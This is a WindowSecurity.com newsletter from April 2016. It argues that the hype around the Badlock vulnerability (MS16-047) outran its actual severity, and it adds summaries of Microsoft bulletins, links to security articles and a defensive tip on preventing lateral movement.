WindowSecurity.com - Monthly Newsletter - April 2016

Welcome to the WindowSecurity.com newsletter by Richard Hicks (MCSE, MCITP:EA, MCSA, Enterprise Security MVP), independent consultant and Microsoft network security and remote access expert. Each month we will bring you interesting and helpful information pertaining to Windows Security. We want to know what all of *you* are interested in hearing about, so please send your questions and suggestions for future newsletter content to winsec@richardhicks.com.


1. Editor's Corner

With this month’s round of security updates, Microsoft released MS16-047, a security update that addresses vulnerabilities in Security Account Manager (SAM) and Local Security Authority (Domain Policy) (LSAD) remote protocols in all supported versions of Windows desktop and server operating systems. What’s interesting about this update is that the security researcher who discovered it essentially promoted it as if it were a new product! They decided to give the vulnerability a catchy name (Badlock), created a logo for it, registered a domain name and created a web site, and even preannounced it to the media. Presumably this was all done to promote the researcher and perhaps their employer, but the ramifications of this strategy require careful consideration.

--Rich

Badlock

It used to be that when a vulnerability was discovered, it was disclosed (hopefully responsibly!) and given a Common Vulnerabilities and Exposures (CVE) number. Now it seems the trend is moving toward publicizing and promoting the vulnerability. Of course naming vulnerabilities has been a thing for quite some time. Code Red, Nimda, Blaster, Slammer, etc. However, these were all named colloquially. None were named for the sole purpose of sensationalizing or promoting the vulnerabilities or their discoverers.

Heartbleed changed all that. This was one of the first vulnerabilities hyped and promoted using commercial marketing techniques like logos, web sites, and press releases. In the specific case of Heartbleed, it was certainly for a good cause. It made everyone take notice of a very serious vulnerability in a key security component used to secure much of the public Internet today.

So it would seem that Badlock and the hype surrounding it would also be beneficial. Turns out, perhaps not so much. When Microsoft released MS16-047 to address the vulnerability, it was only rated Important! The vulnerability with a name and its own web site doesn’t even rate Microsoft’s highest severity rating of Critical.

As it turns out, “Badlock” is only a privilege escalation vulnerability and would require an attacker to launch a man-in-the-middle attack to exploit it. Fundamentally, the attacker would already have compromised the target organization and established a foothold to take advantage of this vulnerability. Of course this is still a serious vulnerability that should be patched immediately to prevent lateral movement once an organization is breached. It is not remotely exploitable at all, which greatly reduces the exposure for attack. Definitely nowhere near the seriousness of Heartbleed.

Is there a lesson to be learned here? I believe there is. The lesson is don’t be fooled by hype. Be diligent. Do your homework. Pay attention, but don’t get caught up in the hype! I expect more vulnerabilities in the future to be publicized and promoted in this same way, so be prepared. Don’t be panicked when the next “super critical vulnerability that will destroy the Internet and society as we know it” is announced. Yes, it could be serious. If it is, do what you’ve always done. Assess the vulnerability in your organization and mitigate as usual.

The sky isn’t falling. Keep calm and patch on.


2. Richard M. Hicks Consulting

Looking for assistance with the design, implementation, or support of a Microsoft DirectAccess remote access solution? Need help migrating from Microsoft Forefront Threat Management Gateway (TMG) 2010? Interested in guidance for integrating on-premises networks with Microsoft Azure or Amazon Web Services? I can help!

I am a Microsoft Certified Solutions Associate (MCSA) with nearly 20 years’ experience working with Microsoft network security platforms. I’ve deployed DirectAccess and VPN solutions for some of the largest organizations in the world. I’ve also helped organizations large and small implement hybrid cloud network solutions, migrate from Forefront TMG to other security platforms, and perform other security related services.

For more information about consulting services, click here.

Image


3. Microsoft Security Bulletins for April 2016

For the month of April Microsoft released 13 security bulletins, 6 of which are rated critical and 7 important. Affected software includes Internet Explorer and Edge browsers, Microsoft Office, .NET Framework, Skype for Business and Lync, and all supported versions of Windows. Cumulative updates for IE and Edge are always essential. Of course MS16-047 should be addressed, but clearly this vulnerability was not as serious as it was made out to be.

For more information about April’s security bulletins click here.

4. Microsoft Security Advisories for April 2016

This month Microsoft released security advisory 3152550, an update to improve wireless mouse input filtering. It addresses a vulnerability in which keyboard HID packets can be injected into a Microsoft wireless mouse device through a USB dongle.


5. Security Articles of Interest

  1. Lots of hype surrounding this month’s announcement of a security vulnerability in Microsoft Windows and SAMBA. A catchy name, a dedicated web site, even a slick logo. Is it helping? Maybe, maybe not. After all the hype, the vulnerability turned out not to be so critical, and not even remotely exploitable. Could all this hype do more harm than good? Veteran security expert Chris Wysopal thinks so.
    http://techcrunch.com/2016/04/11/hyping-vulnerabilities-is-no-longer-helping-application-security-awareness/

  2. The IPv6 address space is vast. With a /64 prefix being the standard subnet, you’d think that performing network reconnaissance would be prohibitively difficult. However, Stateless IPv6 Address Autoconfiguration (SLAAC) currently uses some deterministic mechanisms that can introduce some security risks. The IETF recently published RFC 7707 “Network Reconnaissance in IPv6 Networks” which describes how current IPv4 scanning techniques might be used as well as some new ones.
    http://blog.si6networks.com/2016/03/the-ietf-has-just-published-rfc-7707_12.html
    https://tools.ietf.org/rfc/rfc7707.txt
    https://www.insinuator.net/2016/04/advanced-ipv6-network-reconnaissance/
  3. With Microsoft’s formal deprecation of Network Access Protection (NAP) and its subsequent removal of the client-side components in Windows 10, organizations are looking for new ways to provide conditional access for both trusted and non-trusted devices. Azure Active Directory (AAD) can be leveraged to provide remote device health attestation and conditional access for VPN. Details here:
    http://blogs.technet.com/b/tip_of_the_day/archive/2016/03/12/tip-of-the-day-the-conditional-access-framework-and-device-compliance-for-vpn.aspx

    http://blogs.technet.com/b/tip_of_the_day/archive/2016/03/14/tip-of-the-day-the-conditional-access-framework-and-device-compliance-for-vpn-part-2.aspx

    http://blogs.technet.com/b/tip_of_the_day/archive/2016/03/15/tip-of-the-day-the-conditional-access-framework-and-device-compliance-for-vpn-part-3.aspx

    http://blogs.technet.com/b/tip_of_the_day/archive/2016/03/16/tip-of-the-day-the-conditional-access-framework-and-device-compliance-for-vpn-part-4.aspx
  4. Security researchers are warning of recently discovered attacks where the attacker is using Word documents with malicious macros along with PowerShell to infect computers. These attacks are targeted, with code looking at system architecture and searching for common types of systems, while attempting to avoid sandbox and security systems.
    http://www.computerworld.com/article/3043570/security/documents-with-malicious-macros-deliver-fileless-malware.html
  5. Microsoft recently announced a new Secure Development blog. This blog will include valuable information focused on providing developers with information about development best practices, new tools and services, and much more.
    https://blogs.msdn.microsoft.com/secdevblog/
  6. Microsoft OneDrive and Microsoft Online Services were recently added to Microsoft’s Bug Bounty Program. Security researchers identifying vulnerabilities in these areas are eligible to receive up to $15,000.00 USD. More details here:
    https://blogs.technet.microsoft.com/msrc/2016/03/18/microsoft-bounty-programs-announce-expansion-bounty-for-microsoft-onedrive/
  7. With great power comes great responsibility. Azure is quite a powerful platform too. Microsoft has a tremendous responsibility to its customers to protect their valuable data residing on their cloud platforms. Trust plays a key role, but what do privacy and control really mean? This Microsoft Cyber Trust blog post explores that important question.
    http://blogs.microsoft.com/cybertrust/2016/03/21/the-trusted-cloud-what-do-privacy-and-control-really-mean/
  8. For cloud hosting providers using the Microsoft Hyper-V virtualization platform, ensuring complete isolation between customers is vital. However, one persistent challenge has been the provider’s access to their each of their customer’s assets. They obviously require access to them, as they are charged with managing them. But what happens when a rogue administrator abuses their privilege? Or an attacker successfully breaches the cloud provider’s management infrastructure? Shielded Virtual Machines, a new feature of Hyper-V in Windows Server 2016, aims to resolve many of those challenges.
    http://windowsitpro.com/hyper-v/super-secure-hyper-v-environments-shielded-vms-2016
  9. Microsoft has a lot of experience defending against persistent attackers. They are, after all, responsible for defending myriad assets residing across their multitude of cloud platforms. They’ve obviously learned a lot by doing so, and thankfully they share that knowledge with the rest of the community, as they’ve done here.
    http://blogs.microsoft.com/cybertrust/2016/03/28/defending-against-persistent-attackers-what-weve-learned/
  10. WordPress is one of the more popular Content Management Systems (CMS) in use on the Internet today. Running WordPress on your own web server is common, but many take advantage of their hosted platform at WordPress.com. The advantages are many, but the one crucial drawback to doing so was the lack of support for HTTPS. Thanks to the Let’s Encrypt initiative, that has finally been resolved. Why use HTTPS for information that is hosted on a public web site you ask? Keep in mind that privacy is only one aspect of using HTTPS. Another critically important advantage for HTTPS on public web sites is integrity. Using HTTPS for public content can be useful for detecting altered content, after all. Definitely a huge win for WordPress!
    https://en.blog.wordpress.com/2016/04/08/https-everywhere-encryption-for-all-wordpress-com-sites/


6. WindowSecurity.com Articles of Interest

  1. The Risk of Running Obsolete Software – Part 2

  2. Defense in Depth – Is It Always Best Practice?

  3. The Risk of Running Obsolete Software – Part 3

  4. Netikus EventSentry: Voted WindowSecurity.com Readers’ Choice Award Winner – Event Log Monitoring

  5. Focal Points for Managing Access to your AWS Management Console

7. Windows Security Tip of the Month

As it turns out, the “Badlock” bug addressed with MS16-047 wasn’t nearly as critical as all the hype made it out to be. It is an important vulnerability that should be mitigated as quickly as possible though, no doubt. The vulnerability could be used by attackers for lateral movement inside your organization after a successful breach. Preventing lateral movement is crucial for making an attacker’s task more difficult once they are inside. Following administrative best practices will reduce this exposure, especially for administrative workstations. Microsoft recently published some excellent guidance for securing administrative workstations. More details here.